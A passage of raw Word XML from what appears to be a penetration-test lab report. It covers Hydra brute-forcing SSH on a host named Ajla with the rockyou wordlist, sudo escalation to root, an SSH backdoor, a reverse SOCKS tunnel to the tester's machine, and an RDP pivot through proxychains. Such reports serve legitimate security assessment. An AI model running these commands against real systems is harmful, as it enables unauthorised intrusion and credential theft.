            <w:bookmarkStart w:id="67" w:name="__RefHeading___Toc5506_4118114545"/>
            <w:bookmarkStart w:id="68" w:name="_Toc92992251"/>
            <w:bookmarkStart w:id="69" w:name="_Toc151462883"/>
            <w:bookmarkEnd w:id="67"/>
            <w:r>
              <w:rPr>
                <w:lang w:val="en-ZA"/>
              </w:rPr>
              <w:t>Initial Access – Password Brute-Forcing</w:t>
            </w:r>
            <w:bookmarkEnd w:id="68"/>
            <w:bookmarkEnd w:id="69"/>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="BodyA"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="DefaultParagraphFont"/>
                <w:b/>
              </w:rPr>
              <w:t>Vulnerability Explanation:</w:t>
            </w:r>
            <w:r>
              <w:rPr/>
              <w:t xml:space="preserve"> The user account on the Ajla host was protected by a trivial password that was cracked within 5 minutes of brute-forcing.</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="BodyA"/>
              <w:widowControl w:val="false"/>
              <w:spacing w:lineRule="auto" w:line="360"/>
              <w:jc w:val="both"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="DefaultParagraphFont"/>
                <w:b/>
              </w:rPr>
              <w:t>Vulnerability Fix:</w:t>
            </w:r>
            <w:r>
              <w:rPr/>
              <w:t xml:space="preserve"> The SSH service should be configured to not accept password-based logins and the user account itself should contain a unique password not contained in the publicly available wordlists.</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="BodyA"/>
              <w:widowControl w:val="false"/>
              <w:spacing w:lineRule="auto" w:line="360"/>
              <w:jc w:val="both"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="DefaultParagraphFont"/>
                <w:b/>
              </w:rPr>
              <w:t xml:space="preserve">Severity: </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="DefaultParagraphFont"/>
                <w:b/>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t>Critical</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="BodyA"/>
              <w:widowControl w:val="false"/>
              <w:spacing w:lineRule="auto" w:line="360"/>
              <w:jc w:val="both"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="DefaultParagraphFont"/>
                <w:b/>
              </w:rPr>
              <w:t>Steps to reproduce the attack:</w:t>
            </w:r>
            <w:r>
              <w:rPr/>
              <w:t xml:space="preserve"> rom the initial service scan John discovered that this host is called Ajla. After adding the target’s IP to the /etc/hosts file, the Hydra tool was run against the SSH service using the machine’s DNS name instead of its IP. With the extracted password at hand John was able to log in as ajla using SSH.</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="BodyA"/>
              <w:widowControl w:val="false"/>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hydra -l ajla -P /home/kali/rockyou.txt -T 20 sandbox.local ssh</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="BodyA"/>
              <w:widowControl w:val="false"/>
              <w:spacing w:lineRule="auto" w:line="360"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rStyle w:val="DefaultParagraphFont"/>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:drawing>
                <wp:anchor behindDoc="0" distT="0" distB="0" distL="0" distR="0" simplePos="0" locked="0" layoutInCell="1" allowOverlap="1" relativeHeight="37">
                  <wp:simplePos x="0" y="0"/>
                  <wp:positionH relativeFrom="column">
                    <wp:align>center</wp:align>
                  </wp:positionH>
                  <wp:positionV relativeFrom="paragraph">
                    <wp:posOffset>635</wp:posOffset>
                  </wp:positionV>
                  <wp:extent cx="5838825" cy="2042160"/>
                  <wp:effectExtent l="0" t="0" r="0" b="0"/>
                  <wp:wrapSquare wrapText="bothSides"/>
                  <wp:docPr id="31" name="Image29"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9" descr="" title=""/>
                          <pic:cNvPicPr>
                            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                          </pic:cNvPicPr>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId36"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr bwMode="auto">
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="5838825" cy="2042160"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:anchor>
              </w:drawing>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Heading3"/>
              <w:widowControl w:val="false"/>
              <w:tabs>
                <w:tab w:val="clear" w:pos="720"/>
                <w:tab w:val="left" w:pos="0" w:leader="none"/>
              </w:tabs>
              <w:spacing w:lineRule="auto" w:line="360" w:before="0" w:after="240"/>
              <w:ind w:hanging="0" w:start="0"/>
              <w:rPr/>
            </w:pPr>
            <w:bookmarkStart w:id="70" w:name="__RefHeading___Toc5508_4118114545"/>
            <w:bookmarkStart w:id="71" w:name="_Toc92992252"/>
            <w:bookmarkStart w:id="72" w:name="_Toc151462884"/>
            <w:bookmarkEnd w:id="70"/>
            <w:r>
              <w:rPr/>
              <w:t>Privilege Escalation – Sudo group</w:t>
            </w:r>
            <w:bookmarkEnd w:id="71"/>
            <w:bookmarkEnd w:id="72"/>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="DefaultParagraphFont"/>
                <w:b/>
              </w:rPr>
              <w:t>Vulnerability</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="BodyA"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="DefaultParagraphFont"/>
                <w:b/>
              </w:rPr>
              <w:t>Explanation:</w:t>
            </w:r>
            <w:r>
              <w:rPr/>
              <w:t xml:space="preserve"> sudo group allows any user in this group to escalate privileges to the root if they know the user’s password.</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="BodyA"/>
              <w:widowControl w:val="false"/>
              <w:spacing w:lineRule="auto" w:line="360"/>
              <w:jc w:val="both"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="DefaultParagraphFont"/>
                <w:b/>
              </w:rPr>
              <w:t>Vulnerability Fix:</w:t>
            </w:r>
            <w:r>
              <w:rPr/>
              <w:t xml:space="preserve"> The SSH service should be configured to not accept password-based logins and the user account itself should contain a unique password not contained in the publicly available wordlists.</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="BodyA"/>
              <w:widowControl w:val="false"/>
              <w:spacing w:lineRule="auto" w:line="360"/>
              <w:jc w:val="both"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="DefaultParagraphFont"/>
                <w:b/>
              </w:rPr>
              <w:t xml:space="preserve">Severity: </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="DefaultParagraphFont"/>
                <w:b/>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t>Critical</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="BodyA"/>
              <w:widowControl w:val="false"/>
              <w:spacing w:lineRule="auto" w:line="360"/>
              <w:jc w:val="both"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="DefaultParagraphFont"/>
                <w:b/>
              </w:rPr>
              <w:t xml:space="preserve">Steps to reproduce the attack: </w:t>
            </w:r>
            <w:r>
              <w:rPr/>
              <w:t>John spotted that the ajla user was a member of the sudo group immediately upon logging in and using the “id” command. And knowing user’s password, he only needed to use a single command “sudo su” in order to obtain a root shell.</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="BodyA"/>
              <w:widowControl w:val="false"/>
              <w:spacing w:lineRule="auto" w:line="360"/>
              <w:jc w:val="both"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr/>
              <w:drawing>
                <wp:anchor behindDoc="0" distT="0" distB="0" distL="0" distR="0" simplePos="0" locked="0" layoutInCell="1" allowOverlap="1" relativeHeight="38">
                  <wp:simplePos x="0" y="0"/>
                  <wp:positionH relativeFrom="column">
                    <wp:align>center</wp:align>
                  </wp:positionH>
                  <wp:positionV relativeFrom="paragraph">
                    <wp:posOffset>635</wp:posOffset>
                  </wp:positionV>
                  <wp:extent cx="5838825" cy="2717800"/>
                  <wp:effectExtent l="0" t="0" r="0" b="0"/>
                  <wp:wrapSquare wrapText="bothSides"/>
                  <wp:docPr id="32" name="Image33"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33" descr="" title=""/>
                          <pic:cNvPicPr>
                            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                          </pic:cNvPicPr>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId37"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr bwMode="auto">
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="5838825" cy="2717800"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:anchor>
              </w:drawing>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Heading3"/>
              <w:widowControl w:val="false"/>
              <w:tabs>
                <w:tab w:val="clear" w:pos="720"/>
                <w:tab w:val="left" w:pos="0" w:leader="none"/>
              </w:tabs>
              <w:spacing w:lineRule="auto" w:line="360" w:before="0" w:after="240"/>
              <w:ind w:hanging="0" w:start="0"/>
              <w:rPr/>
            </w:pPr>
            <w:bookmarkStart w:id="73" w:name="__RefHeading___Toc5479_4118114545"/>
            <w:bookmarkStart w:id="74" w:name="_Toc92992253"/>
            <w:bookmarkStart w:id="75" w:name="_Toc151462885"/>
            <w:bookmarkEnd w:id="73"/>
            <w:r>
              <w:rPr/>
              <w:t>Post-Exploitation</w:t>
            </w:r>
            <w:bookmarkEnd w:id="74"/>
            <w:bookmarkEnd w:id="75"/>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="BodyA"/>
              <w:widowControl w:val="false"/>
              <w:spacing w:lineRule="auto" w:line="360"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>System Proof screenshot:</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="BodyA"/>
              <w:widowControl w:val="false"/>
              <w:spacing w:lineRule="auto" w:line="360"/>
              <w:jc w:val="both"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:drawing>
                <wp:anchor behindDoc="0" distT="0" distB="0" distL="0" distR="0" simplePos="0" locked="0" layoutInCell="1" allowOverlap="1" relativeHeight="36">
                  <wp:simplePos x="0" y="0"/>
                  <wp:positionH relativeFrom="column">
                    <wp:align>center</wp:align>
                  </wp:positionH>
                  <wp:positionV relativeFrom="paragraph">
                    <wp:posOffset>635</wp:posOffset>
                  </wp:positionV>
                  <wp:extent cx="5838825" cy="1761490"/>
                  <wp:effectExtent l="0" t="0" r="0" b="0"/>
                  <wp:wrapSquare wrapText="bothSides"/>
                  <wp:docPr id="33" name="Image34"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34" descr="" title=""/>
                          <pic:cNvPicPr>
                            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                          </pic:cNvPicPr>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId38"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr bwMode="auto">
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="5838825" cy="1761490"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:anchor>
              </w:drawing>
            </w:r>
            <w:r>
              <w:rPr/>
              <w:t>After collecting the proof files and establishing a backdoor using SSH, John began the enumeration of the filesystem for the presence of interesting files. He noticed that there was a mounted share originating from the 10.5.5.20 IP. Inspecting a custom sysreport.ps1 script in the /mnt/scripts directory he found cleartext credentials for the “sandbox\alex” user. Taking into consideration the type of scripts in this directory and the username structure, it seems that the “Poultry” host is a part of the Active Directory environment.</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="BodyA"/>
              <w:widowControl w:val="false"/>
              <w:spacing w:lineRule="auto" w:line="360"/>
              <w:jc w:val="both"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:drawing>
                <wp:anchor behindDoc="0" distT="0" distB="0" distL="0" distR="0" simplePos="0" locked="0" layoutInCell="1" allowOverlap="1" relativeHeight="34">
                  <wp:simplePos x="0" y="0"/>
                  <wp:positionH relativeFrom="column">
                    <wp:align>center</wp:align>
                  </wp:positionH>
                  <wp:positionV relativeFrom="paragraph">
                    <wp:posOffset>635</wp:posOffset>
                  </wp:positionV>
                  <wp:extent cx="5838825" cy="1689100"/>
                  <wp:effectExtent l="0" t="0" r="0" b="0"/>
                  <wp:wrapSquare wrapText="bothSides"/>
                  <wp:docPr id="34" name="Image35"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35" descr="" title=""/>
                          <pic:cNvPicPr>
                            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                          </pic:cNvPicPr>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId39"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr bwMode="auto">
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="5838825" cy="1689100"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:anchor>
              </w:drawing>
            </w:r>
            <w:r>
              <w:rPr/>
              <w:t>John began the lateral movement by establishing a reverse dynamic port forwarding using SSH. First, he generated a new pair of SSH keys and added those to the authorized_keys file on his Kali VM, then he just needed to issue a single SSH port forwarding command:</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="BodyA"/>
              <w:widowControl w:val="false"/>
              <w:spacing w:lineRule="auto" w:line="360"/>
              <w:jc w:val="both"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr/>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="BodyA"/>
              <w:widowControl w:val="false"/>
              <w:shd w:val="clear" w:fill="D9D9D9"/>
              <w:spacing w:lineRule="auto" w:line="240"/>
              <w:jc w:val="both"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="None"/>
                <w:rFonts w:eastAsia="Consolas" w:cs="Consolas" w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>└─</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="None"/>
                <w:rFonts w:eastAsia="Consolas" w:cs="Consolas" w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">$ </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="None"/>
                <w:rFonts w:eastAsia="Consolas" w:cs="Consolas"/>
              </w:rPr>
              <w:t>ssh-keygen -t rsa -N ‘’ -f ~/.ssh/key</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="BodyA"/>
              <w:widowControl w:val="false"/>
              <w:shd w:val="clear" w:fill="D9D9D9"/>
              <w:spacing w:lineRule="auto" w:line="240"/>
              <w:jc w:val="both"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="None"/>
                <w:rFonts w:eastAsia="Consolas" w:cs="Consolas" w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>└─</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="None"/>
                <w:rFonts w:eastAsia="Consolas" w:cs="Consolas" w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">$ </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="None"/>
                <w:rFonts w:eastAsia="Consolas" w:cs="Consolas"/>
              </w:rPr>
              <w:t xml:space="preserve">ssh -f -N -R 1080 -o “UserKnownHostsFile=/dev/null” -o “StrictHostKeyChecking=no” -I key </w:t>
            </w:r>
            <w:hyperlink r:id="rId40" w:tgtFrame="_top">
              <w:r>
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:eastAsia="Consolas" w:cs="Consolas"/>
                </w:rPr>
                <w:t>kali@192.168.119.164</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="BodyA"/>
              <w:widowControl w:val="false"/>
              <w:spacing w:lineRule="auto" w:line="360"/>
              <w:jc w:val="both"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr/>
              <w:t>With the dynamic reverse tunnel established, John only needed to edit the /etc/proxychains.conf to use the port 1080.</w:t>
            </w:r>
            <w:bookmarkStart w:id="76" w:name="_Toc92992254"/>
            <w:bookmarkStart w:id="77" w:name="_Toc151462886"/>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Heading2"/>
              <w:widowControl w:val="false"/>
              <w:tabs>
                <w:tab w:val="clear" w:pos="720"/>
                <w:tab w:val="left" w:pos="0" w:leader="none"/>
              </w:tabs>
              <w:ind w:hanging="0" w:start="0"/>
              <w:rPr/>
            </w:pPr>
            <w:bookmarkStart w:id="78" w:name="__RefHeading___Toc5481_4118114545"/>
            <w:bookmarkEnd w:id="78"/>
            <w:r>
              <w:rPr/>
              <w:t>Poultry – 10.5.5.20</w:t>
            </w:r>
            <w:bookmarkEnd w:id="76"/>
            <w:bookmarkEnd w:id="77"/>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Heading3"/>
              <w:widowControl w:val="false"/>
              <w:tabs>
                <w:tab w:val="clear" w:pos="720"/>
                <w:tab w:val="left" w:pos="0" w:leader="none"/>
              </w:tabs>
              <w:spacing w:lineRule="auto" w:line="360"/>
              <w:ind w:hanging="0" w:start="0"/>
              <w:rPr/>
            </w:pPr>
            <w:bookmarkStart w:id="79" w:name="__RefHeading___Toc5483_4118114545"/>
            <w:bookmarkStart w:id="80" w:name="_Toc92992255"/>
            <w:bookmarkStart w:id="81" w:name="_Toc151462887"/>
            <w:bookmarkEnd w:id="79"/>
            <w:r>
              <w:rPr/>
              <w:t>Initial Access – RDP login</w:t>
            </w:r>
            <w:bookmarkEnd w:id="80"/>
            <w:bookmarkEnd w:id="81"/>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="BodyA"/>
              <w:widowControl w:val="false"/>
              <w:spacing w:lineRule="auto" w:line="360"/>
              <w:jc w:val="both"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="DefaultParagraphFont"/>
                <w:b/>
              </w:rPr>
              <w:t>Steps to reproduce the attack:</w:t>
            </w:r>
            <w:r>
              <w:rPr/>
              <w:t xml:space="preserve"> with the credentials at hand and a reverse tunnel established, John connected to an RDP session using proxychains accepting the certificate when prompted and entering the retrieved password afterward.</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="BodyA"/>
              <w:widowControl w:val="false"/>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xml:space="preserve">$ </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="None"/>
                <w:rFonts w:eastAsia="Consolas" w:cs="Consolas"/>
              </w:rPr>
              <w:t>proxychains xfreerdp /d:sandbox /u:alex /v:10.5.5.20 +clipboard</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Heading3"/>
              <w:keepLines w:val="false"/>
              <w:widowControl w:val="false"/>
              <w:tabs>
                <w:tab w:val="clear" w:pos="720"/>
                <w:tab w:val="left" w:pos="0" w:leader="none"/>
              </w:tabs>
              <w:spacing w:lineRule="auto" w:line="360"/>
              <w:ind w:hanging="0" w:start="0"/>
              <w:rPr/>
            </w:pPr>
            <w:bookmarkStart w:id="82" w:name="__RefHeading___Toc5485_4118114545"/>
            <w:bookmarkStart w:id="83" w:name="_Toc92992256"/>
            <w:bookmarkStart w:id="84" w:name="_Toc151462888"/>
            <w:bookmarkEnd w:id="82"/>
            <w:r>
              <w:rPr/>
              <w:t>Post-Exploitation</w:t>
            </w:r>
            <w:bookmarkEnd w:id="83"/>
            <w:bookmarkEnd w:id="84"/>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="BodyA"/>
              <w:widowControl w:val="false"/>
              <w:spacing w:lineRule="auto" w:line="360" w:before="240" w:after="0"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>Local Proof Screenshot:</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="BodyA"/>
              <w:widowControl w:val="false"/>
              <w:spacing w:lineRule="auto" w:line="360" w:before="240" w:after="0"/>
              <w:jc w:val="both"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr/>
              <w:drawing>
                <wp:anchor behindDoc="0" distT="0" distB="0" distL="0" distR="0" simplePos="0" locked="0" layoutInCell="1" allowOverlap="1" relativeHeight="39">
                  <wp:simplePos x="0" y="0"/>
                  <wp:positionH relativeFrom="column">
                    <wp:align>center</wp:align>
                  </wp:positionH>
                  <wp:positionV relativeFrom="paragraph">
                    <wp:posOffset>635</wp:posOffset>
                  </wp:positionV>
                  <wp:extent cx="5838825" cy="4493895"/>
                  <wp:effectExtent l="0" t="0" r="0" b="0"/>
                  <wp:wrapSquare wrapText="bothSides"/>
                  <wp:docPr id="35" name="Image36"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36" descr="" title=""/>
                          <pic:cNvPicPr>
                            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                          </pic:cNvPicPr>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId41"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr bwMode="auto">
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="5838825" cy="4493895"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:anchor>
              </w:drawing>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="BodyA"/>
              <w:keepNext w:val="true"/>
              <w:widowControl w:val="false"/>
              <w:spacing w:lineRule="auto" w:line="360"/>
              <w:jc w:val="both"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr/>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="BodyA"/>
              <w:widowControl w:val="false"/>
              <w:spacing w:lineRule="auto" w:line="360"/>
              <w:jc w:val="both"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr/>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="BodyA"/>
              <w:widowControl w:val="false"/>
              <w:spacing w:lineRule="auto" w:line="360"/>
              <w:jc w:val="both"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr/>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="BodyA"/>
              <w:keepNext w:val="true"/>
              <w:widowControl w:val="false"/>
              <w:spacing w:lineRule="auto" w:line="360"/>
              <w:jc w:val="both"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr/>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="BodyA"/>
              <w:keepNext w:val="true"/>
              <w:widowControl w:val="false"/>
              <w:spacing w:lineRule="auto" w:line="360"/>
              <w:jc w:val="both"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr/>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="BodyA"/>
              <w:keepNext w:val="true"/>
              <w:widowControl w:val="false"/>
              <w:spacing w:lineRule="auto" w:line="360"/>
              <w:jc w:val="both"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr/>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="BodyA"/>
              <w:keepNext w:val="true"/>
              <w:widowControl w:val="false"/>
              <w:spacing w:lineRule="auto" w:line="360"/>
              <w:jc w:val="both"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr/>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="BodyA"/>
              <w:keepNext w:val="true"/>
              <w:widowControl w:val="false"/>
              <w:spacing w:lineRule="auto" w:line="360"/>
              <w:jc w:val="both"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:drawing>
                <wp:anchor behindDoc="0" distT="0" distB="0" distL="0" distR="0" simplePos="0" locked="0" layoutInCell="1" allowOverlap="1" relativeHeight="35">
                  <wp:simplePos x="0" y="0"/>
                  <wp:positionH relativeFrom="column">
                    <wp:posOffset>-4445</wp:posOffset>
                  </wp:positionH>
                  <wp:positionV relativeFrom="paragraph">
                    <wp:posOffset>488950</wp:posOffset>
                  </wp:positionV>
                  <wp:extent cx="5838825" cy="3204210"/>
                  <wp:effectExtent l="0" t="0" r="0" b="0"/>
                  <wp:wrapSquare wrapText="bothSides"/>
                  <wp:docPr id="36" name="Image37"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37" descr="" title=""/>
                          <pic:cNvPicPr>
                            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                          </pic:cNvPicPr>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId42"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr bwMode="auto">
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="5838825" cy="3204210"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:anchor>
              </w:drawing>
            </w:r>
            <w:r>
              <w:rPr/>
              <w:t>John noticed the presence of the Thunderbird program on the user’s desktop, and while checking Alex’s inbox he found the email from a local administrator Roger:</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="BodyA"/>
              <w:widowControl w:val="false"/>
              <w:spacing w:lineRule="auto" w:line="360"/>
              <w:jc w:val="both"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr/>
              <w:t>[...]</w:t>
            </w:r>
            <w:bookmarkStart w:id="85" w:name="_Toc92992257"/>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Heading2"/>
              <w:widowControl w:val="false"/>
              <w:tabs>
                <w:tab w:val="clear" w:pos="720"/>
                <w:tab w:val="left" w:pos="0" w:leader="none"/>
              </w:tabs>
              <w:ind w:hanging="0" w:start="0"/>
              <w:rPr/>
            </w:pPr>
            <w:bookmarkStart w:id="86" w:name="__RefHeading___Toc5487_4118114545"/>
            <w:bookmarkStart w:id="87" w:name="_Toc151462889"/>
            <w:bookmarkEnd w:id="86"/>
            <w:r>
              <w:rPr/>
              <w:t>DC – 10.5.5.30</w:t>
            </w:r>
            <w:bookmarkEnd w:id="85"/>
            <w:bookmarkEnd w:id="87"/>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Heading3"/>
              <w:widowControl w:val="false"/>
              <w:tabs>
                <w:tab w:val="clear" w:pos="720"/>
                <w:tab w:val="left" w:pos="0" w:leader="none"/>
              </w:tabs>
              <w:spacing w:lineRule="auto" w:line="360" w:before="0" w:after="240"/>
              <w:ind w:hanging="0" w:start="0"/>
              <w:rPr>
                <w:lang w:val="en-ZA"/>
              </w:rPr>
            </w:pPr>
            <w:bookmarkStart w:id="88" w:name="__RefHeading___Toc5489_4118114545"/>
            <w:bookmarkStart w:id="89" w:name="_Toc92992258"/>
            <w:bookmarkStart w:id="90" w:name="_Toc151462890"/>
            <w:bookmarkEnd w:id="88"/>
            <w:r>
              <w:rPr>
                <w:lang w:val="en-ZA"/>
              </w:rPr>
              <w:t>Initial Access – Remote Commands Execution</w:t>
            </w:r>
            <w:bookmarkEnd w:id="89"/>
